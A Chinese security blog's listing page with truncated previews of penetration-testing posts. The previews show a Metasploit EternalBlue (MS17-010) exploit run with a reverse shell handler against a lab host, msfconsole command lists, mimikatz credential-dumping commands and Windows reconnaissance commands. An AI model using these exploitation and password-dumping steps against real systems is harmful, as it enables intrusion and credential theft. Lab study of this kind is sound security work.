TypechoJoeTheme

学习使用

统计
登录
用户名
密码
搜索到 21 篇与 的结果 ———
2022-02-28

MSF内网渗透实战

MSF内网渗透实战
渗透边界机msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.2.242 rhosts => 192.168.2.242 msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit [*] Started reverse TCP handler on 192.168.2.200:10000 [*] 192.168.2.242:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check [+] 192.168.2.242:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit) [*] 192.168.2.242:445 - Scanned 1 of 1 hosts (100% complete) [+] 19...
admin
2022-02-28

内网渗透,渗透测试

1,370 阅读
0 评论
2022年02月28日
1,370 阅读
0 评论
2022-02-27

MSF常用命令

MSF常用命令
MSF命令控制台基本命令msfconsole ——控制台模式exit ——退出msfsearch ——搜索模块banner —— 显示banner信息color —— 启用/禁用颜色提示 —— color true/falseconnect —— 连接服务器的指定端口获取工作在端口上工作的服务的banner信息 —— connect 192.168.1.1 80show —— 展示模块信息 —— show payloadsshow options ——显示需要设置的项(进入模块)search —— 搜索模块 —— search ms08-067search name:mysql cve:2020 platform:linux type:expoitload —— 调用外部插件 —— load nessusunload —— 删除外部插件 —— unload nessusloadpath —— 调用指定目录中的其他模块 —— loadpath 路径route —— 转发一个会话的其他子网的流量 —— route add 子网地址 子网掩码 sessionsIDird —— 开发环境...
admin
2022-02-27

内网渗透,渗透测试,安全工具

2,814 阅读
0 评论
2022年02月27日
2,814 阅读
0 评论
2022-02-27

MS17-010渗透实战

MS17-010渗透实战
利用MS17-010渗透win7使用模块:msf6 > use auxiliary/scanner/smb/smb_ms17_010查看配置信息:msf6 auxiliary(scanner/smb/smb_ms17_010) > show options设置目标IPset rhost 192.168.2.242进行扫描:(需要关闭防火墙)msf6 auxiliary(scanner/smb/smb_ms17_010) > run [+] 192.168.2.242:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit) [*] 192.168.2.242:445 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed ###存在“永恒之蓝”漏洞###漏洞利用模块msf6 > use e...
admin
2022-02-27

内网渗透,渗透测试

1,049 阅读
0 评论
2022年02月27日
1,049 阅读
0 评论
2022-02-26

mimikatz/kiwi

mimikatz/kiwi
Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,本意是用来个人测试,但由于其功能强大,能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具。目前,该模块已经更新为功能更全的kiwi模块。cs-mimikatz在 Beacon 中集成了 mimikatz ,mimikatz 执行命令有三种形式:mimikatz [module::command] <args> 运行 mimikatz 命令 mimikatz [!module::command] <args> 强制提升到 SYSTEM 权限再运行命令,因为一些命令只有在 SYSTEM 身份下才能被运行。 mimikatz [@module::command] <args> 使用当前 Beacon 的访问令牌运行 mimikatz 命令 下面是一些mimikatz命令。!lsadump::cache 获取缓存凭证,默认情况下 Windows 会缓存最近10个密码哈希 !lsadump::sam 获取本地账户密码...
admin
2022-02-26

内网渗透,渗透测试,安全工具

1,509 阅读
0 评论
2022年02月26日
1,509 阅读
0 评论
2022-02-26

内网信息收集

内网信息收集
Windows系统信息systeminfo | findstr "OS"C:\Users\Sam>systeminfo | findstr "os" OS 名称: Microsoft Windows 11 专业版 OS 制造商: Microsoft Corporation [03]: Microsoft Wi-Fi Direct Virtual Adapter系统补丁wmic qfe get caption,description,hotfixid,installedonC:\Users\Sam>wmic qfe get caption,description,hotfixid,installedon Caption Description HotFixID InstalledOn http://support.microsoft.com/?kbid=5013889 Update ...
admin
2022-02-26

内网渗透,渗透测试

2,556 阅读
0 评论
2022年02月26日
2,556 阅读
0 评论